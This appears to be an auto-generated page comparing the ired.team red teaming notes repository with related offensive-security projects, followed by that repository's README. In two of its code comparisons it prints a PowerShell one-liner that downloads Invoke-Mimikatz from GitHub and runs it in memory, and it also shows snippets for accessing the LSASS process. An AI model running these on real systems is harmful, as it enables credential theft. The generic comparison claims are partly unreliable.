Top Related Projects
List of Awesome Red Teaming Resources
Wiki to collect Red Team infrastructure hardening resources
Small and highly portable detection tests based on MITRE's ATT&CK.
This repository contains cutting-edge open-source security tools (OST) for a red teamer and threat hunter.
Red Team Tips as posted by @vysecurity on Twitter
Attack and defend active directory using modern post exploitation adversary tradecraft activity
Quick Overview
The mantvydasb/RedTeaming-Tactics-and-Techniques repository is a comprehensive collection of red teaming and penetration testing resources. It covers various tactics, techniques, and procedures (TTPs) used in offensive security operations, providing valuable information for both red teamers and defenders.
Pros
- Extensive coverage of red teaming topics and techniques
- Well-organized and regularly updated content
- Includes practical examples and real-world scenarios
- Valuable resource for both beginners and experienced professionals
Cons
- Some techniques may be outdated or less relevant for modern environments
- Lacks a structured learning path for beginners
- May require additional research to fully understand and implement certain techniques
- Could benefit from more detailed explanations for complex topics
Note: As this is not a code library, the code example and quick start sections have been omitted as per the instructions.
Competitor Comparisons
List of Awesome Red Teaming Resources
Pros of Awesome-Red-Teaming
- Broader coverage of red teaming topics, including social engineering and physical security
- More frequently updated with new resources and tools
- Better organized with clear categories and subcategories
Cons of Awesome-Red-Teaming
- Less in-depth technical explanations for specific techniques
- Fewer hands-on examples and practical demonstrations
- More focused on listing resources rather than providing detailed guidance
Code Comparison
While both repositories primarily focus on curating resources rather than providing code examples, RedTeaming-Tactics-and-Techniques occasionally includes code snippets for specific techniques. For example:
RedTeaming-Tactics-and-Techniques:
$bytes = (Invoke-WebRequest "https://github.com/PowerShellMafia/PowerSploit/raw/master/Exfiltration/Invoke-Mimikatz.ps1" -UseBasicParsing).Content
$decoded = [System.Text.Encoding]::ASCII.GetString($bytes)
Invoke-Expression $decoded
Awesome-Red-Teaming does not typically include code snippets, focusing instead on linking to external resources and tools.
Both repositories serve as valuable resources for red teaming professionals, with RedTeaming-Tactics-and-Techniques offering more technical depth and Awesome-Red-Teaming providing a broader overview of the field.
Wiki to collect Red Team infrastructure hardening resources
Pros of Red-Team-Infrastructure-Wiki
- Focuses specifically on red team infrastructure setup and management
- Provides detailed guides on various infrastructure components (e.g., redirectors, domain fronting)
- Includes practical examples and tools for implementation
Cons of Red-Team-Infrastructure-Wiki
- Narrower scope compared to RedTeaming-Tactics-and-Techniques
- Less emphasis on offensive techniques and tactics
- May require more background knowledge to fully utilize
Code Comparison
While both repositories primarily contain documentation rather than code, Red-Team-Infrastructure-Wiki includes some configuration examples:
# Red-Team-Infrastructure-Wiki example (Apache mod_rewrite configuration)
RewriteEngine On
RewriteCond %{HTTP_HOST} ^example\.com$ [NC]
RewriteRule ^(.*)$ https://destination.com/$1 [P,L]
RedTeaming-Tactics-and-Techniques focuses more on explaining concepts and techniques without specific code examples.
Summary
Red-Team-Infrastructure-Wiki is a specialized resource for setting up and managing red team infrastructure, offering detailed guides and practical examples. However, it has a narrower focus compared to RedTeaming-Tactics-and-Techniques, which covers a broader range of red teaming topics and techniques. The choice between the two depends on whether you need specific infrastructure guidance or a more comprehensive overview of red teaming tactics.
Small and highly portable detection tests based on MITRE's ATT&CK.
Pros of Atomic Red Team
- Provides a comprehensive library of tests for various attack techniques
- Offers easy-to-use, automated testing capabilities
- Regularly updated with new tests and improvements
Cons of Atomic Red Team
- Focuses primarily on Windows environments, with less coverage for other platforms
- May require additional setup and dependencies for some tests
Code Comparison
Atomic Red Team (PowerShell):
Invoke-AtomicTest T1003.001 -TestNumbers 1
RedTeaming-Tactics-and-Techniques (PowerShell):
Get-Process lsass | Select-Object -ExpandProperty Id
Both repositories provide valuable resources for red teaming and security testing. Atomic Red Team offers a more structured and automated approach to testing specific attack techniques, while RedTeaming-Tactics-and-Techniques provides a broader range of information and manual techniques.
Atomic Red Team is ideal for organizations looking to implement continuous security testing and validation, while RedTeaming-Tactics-and-Techniques serves as a comprehensive knowledge base for red teamers and security professionals.
Ultimately, both repositories complement each other and can be used together to enhance an organization's security posture and red teaming capabilities.
This repository contains cutting-edge open-source security tools (OST) for a red teamer and threat hunter.
Pros of Red-Teaming-Toolkit
- More concise and focused on specific tools and techniques
- Regularly updated with new resources and tools
- Includes a wider range of categories, such as cloud security and IoT
Cons of Red-Teaming-Toolkit
- Less detailed explanations and context for each technique
- Lacks the comprehensive theoretical background provided in RedTeaming-Tactics-and-Techniques
- May be overwhelming for beginners due to the large number of tools listed
Code Comparison
While both repositories primarily focus on curating resources rather than providing extensive code samples, RedTeaming-Tactics-and-Techniques occasionally includes code snippets to illustrate specific techniques. For example:
RedTeaming-Tactics-and-Techniques:
$bytes = (Invoke-WebRequest "https://github.com/PowerShellMafia/PowerSploit/raw/master/Exfiltration/Invoke-Mimikatz.ps1" -UseBasicParsing).Content
$decoded = [System.Text.Encoding]::ASCII.GetString($bytes)
Invoke-Expression $decoded
Red-Teaming-Toolkit doesn't typically include code snippets, instead focusing on linking to external resources and tools.
Both repositories serve as valuable resources for red team professionals, with RedTeaming-Tactics-and-Techniques offering a more in-depth educational approach, while Red-Teaming-Toolkit provides a comprehensive toolkit for practitioners.
Red Team Tips as posted by @vysecurity on Twitter
Pros of RedTips
- Concise and easy-to-digest format with quick tips and techniques
- Regularly updated with new content and community contributions
- Focuses on practical, real-world red teaming scenarios
Cons of RedTips
- Less comprehensive coverage of topics compared to RedTeaming-Tactics-and-Techniques
- Limited in-depth explanations and theoretical background
- Fewer structured learning paths for beginners
Code Comparison
RedTips example:
Get-WmiObject -Class Win32_UserAccount -Filter "LocalAccount='True'" | Select Name,SID
RedTeaming-Tactics-and-Techniques example:
$users = Get-WmiObject -Class Win32_UserAccount -Filter "LocalAccount='True'"
foreach ($user in $users) {
Write-Output "Username: $($user.Name)"
Write-Output "SID: $($user.SID)"
}
Both repositories provide valuable resources for red teaming, but they serve different purposes. RedTips offers quick, actionable tips for practitioners, while RedTeaming-Tactics-and-Techniques provides a more comprehensive and structured approach to learning red teaming concepts and techniques. The choice between the two depends on the user's experience level and learning objectives.
Attack and defend active directory using modern post exploitation adversary tradecraft activity
Pros of AD-Attack-Defense
- Focuses specifically on Active Directory attacks and defenses
- Includes both offensive and defensive techniques
- Provides a comprehensive list of tools for AD security
Cons of AD-Attack-Defense
- Less detailed explanations compared to RedTeaming-Tactics-and-Techniques
- Narrower scope, primarily covering Active Directory
- Fewer code examples and practical demonstrations
Code Comparison
AD-Attack-Defense:
Get-ADUser -Filter * -Properties * | Select-Object Name, SamAccountName, UserPrincipalName, Enabled
RedTeaming-Tactics-and-Techniques:
public static string GetLsassHandle()
{
Process[] lsass = Process.GetProcessesByName("lsass");
return lsass[0].Handle.ToString();
}
The AD-Attack-Defense repository provides a PowerShell command for enumerating AD users, while RedTeaming-Tactics-and-Techniques offers a C# method for obtaining the LSASS process handle. This difference highlights the broader scope and more technical approach of RedTeaming-Tactics-and-Techniques compared to the AD-focused content in AD-Attack-Defense.
Both repositories serve as valuable resources for security professionals, with AD-Attack-Defense offering a concentrated look at Active Directory security, and RedTeaming-Tactics-and-Techniques providing a wider range of red teaming techniques and more in-depth explanations.
Convert designs to code with AI
Introducing Visual Copilot: A new AI model to turn Figma designs to high quality code using your components.
Try Visual CopilotREADME
description: >- These are notes about all things focusing on, but not limited to, red teaming and offensive security.
What is ired.team notes?
This is publicly accessible personal red teaming notes at https://ired.team and https://github.com/mantvydasb/RedTeam-Tactics-and-Techniques about my pentesting / red teaming experiments in a controlled environment that involve playing with various tools and techniques used by penetration testers, red teams and actual adversaries.
This is my way of learning things - by doing, following, tinkering, exploring, repeating and taking notes.
At ired.team, I explore some of the common offensive security techniques involving gaining code execution, code injection, defense evasion, lateral movement, persistence and more.
Most of these techniques are discovered by other security researchers and I do not claim their ownership. I try to reference the sources I use the best I can, but if you think I've missed something, please get in touch and I will fix it immediately.
{% hint style="warning" %}
- Do not take everything or anything in these notes for granted.
- Do not expect the notes to be exhaustive or covering the techniques or the artifacts they produce in full.
- Expect mistakes in the notes.
- Always consult additional resources. {% endhint %}
{% hint style="danger" %}
Warning
ired.team Red Teaming Experiments GitBook is created by @spotheplanet.
Cloning it and presenting it as your own is illegal and strictly forbidden, don't do it.
{% endhint %}
{% hint style="success" %} Support and Donations
If you appreciate ired.team and would like to show support, you can do it via my:
- Patreon
- paypal mantvydo@gmail.com {% endhint %}
The Goal
The goal of this project is simple - read other researchers work, execute some common/uncommon attacking techniques in a lab environment, do my own reasearch and:
- understand how various cyber attacks and techniques can be executed and how they work
- learn about how malware is written
- write code to further understand the tools and techniques used by attackers and malware authors
- learn more about C++, Windows internals and Windows APIs
- see what artifacts the techniques and tools leave behind on the endpoint
- try out various industry tools for pentesting, coding, debugging, reverse engineering, malware analysis, and become more profficient in using them
- take notes for future reference
Social
Follow me on twitter:
{% embed url="https://twitter.com/spotheplanet" %}
Top Related Projects
List of Awesome Red Teaming Resources
Wiki to collect Red Team infrastructure hardening resources
Small and highly portable detection tests based on MITRE's ATT&CK.
This repository contains cutting-edge open-source security tools (OST) for a red teamer and threat hunter.
Red Team Tips as posted by @vysecurity on Twitter
Attack and defend active directory using modern post exploitation adversary tradecraft activity
Convert designs to code with AI
Introducing Visual Copilot: A new AI model to turn Figma designs to high quality code using your components.
Try Visual Copilot